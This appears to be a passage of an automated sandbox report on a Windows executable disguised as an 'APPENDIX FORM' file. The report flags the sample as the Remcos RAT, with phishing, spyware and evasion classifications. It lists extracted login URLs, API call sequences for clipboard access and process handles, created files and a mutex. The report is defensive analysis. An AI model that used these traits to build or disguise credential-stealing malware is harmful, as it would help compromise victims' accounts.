            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?23ecc2fb73d617d9826364f47d1067db
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?7bac4e73e9b20fcc41dc97447167937d
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-07-50-22/PreSignInSettingsConfig.json
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=d75433bcf1f9312f1975
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=ad62f4
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: bhv2DCB.tmp.8.drString found in binary or memory: https://www.office.com/
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_00405109 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405109
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,8_2_0040987A
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,8_2_004098E2
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_00406DFC
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,9_2_00406E9F
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004068B5
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,10_2_004072B5

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.2163487137.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 6836, type: MEMORYSTR
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,8_2_0040DD85
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00401806 NtdllDefWindowProc_W,8_2_00401806
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_004018C0 NtdllDefWindowProc_W,8_2_004018C0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_004016FD NtdllDefWindowProc_A,9_2_004016FD
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_004017B7 NtdllDefWindowProc_A,9_2_004017B7
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_00402CAC NtdllDefWindowProc_A,10_2_00402CAC
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_00402D66 NtdllDefWindowProc_A,10_2_00402D66
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_00403219 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403219
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_00403219 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_00403219
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_004049480_2_00404948
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_004062BA0_2_004062BA
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_004049484_2_00404948
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_004062BA4_2_004062BA
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333F71944_2_333F7194
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 4_2_333EB5C14_2_333EB5C1
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0044B0408_2_0044B040
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0043610D8_2_0043610D
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_004473108_2_00447310
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0044A4908_2_0044A490
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0040755A8_2_0040755A
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0043C5608_2_0043C560
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0044B6108_2_0044B610
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0044D6C08_2_0044D6C0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_004476F08_2_004476F0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0044B8708_2_0044B870
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0044081D8_2_0044081D
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_004149578_2_00414957
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_004079EE8_2_004079EE
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00407AEB8_2_00407AEB
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0044AA808_2_0044AA80
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00412AA98_2_00412AA9
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00404B748_2_00404B74
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00404B038_2_00404B03
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0044BBD88_2_0044BBD8
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00404BE58_2_00404BE5
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00404C768_2_00404C76
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00415CFE8_2_00415CFE
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00416D728_2_00416D72
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00446D308_2_00446D30
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00446D8B8_2_00446D8B
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00406E8F8_2_00406E8F
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_004050389_2_00405038
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_0041208C9_2_0041208C
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_004050A99_2_004050A9
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_0040511A9_2_0040511A
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_0043C13A9_2_0043C13A
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_004051AB9_2_004051AB
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_004493009_2_00449300
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_0040D3229_2_0040D322
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_0044A4F09_2_0044A4F0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_0043A5AB9_2_0043A5AB
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_004136319_2_00413631
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_004466909_2_00446690
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_0044A7309_2_0044A730
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_004398D89_2_004398D8
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_004498E09_2_004498E0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_0044A8869_2_0044A886
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_0043DA099_2_0043DA09
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_00438D5E9_2_00438D5E
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_00449ED09_2_00449ED0
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_0041FE839_2_0041FE83
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 9_2_00430F549_2_00430F54
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_004050C210_2_004050C2
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_004014AB10_2_004014AB
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_0040513310_2_00405133
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_004051A410_2_004051A4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_0040124610_2_00401246
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_0040CA4610_2_0040CA46
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_0040523510_2_00405235
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_004032C810_2_004032C8
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_004222D910_2_004222D9
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_0040168910_2_00401689
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_00402F6010_2_00402F60
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: String function: 004029FF appears 51 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: String function: 00413025 appears 79 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: String function: 00416760 appears 69 times
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.1962616328.0000000032D91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.1986503569.00000000028E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623393052.00000000333CB000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.1966707690.00000000028CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.1986604309.00000000028E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeBinary or memory string: OriginalFileName vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeBinary or memory string: OriginalFilename vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/14@1/2
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,8_2_004182CE
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 10_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,10_2_00410DE1
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_0040440C GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040440C
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,8_2_00413D4C
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 0_2_00402036 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_00402036
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeCode function: 8_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,8_2_0040B58D
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile created: C:\Program Files (x86)\Common Files\situationer.iniJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile created: C:\Users\user\AppData\Roaming\OrkestralJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-CDCZ2K
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile created: C:\Users\user~1\AppData\Local\Temp\nso3C28.tmpJump to behavior
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623139235.00000000332C0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
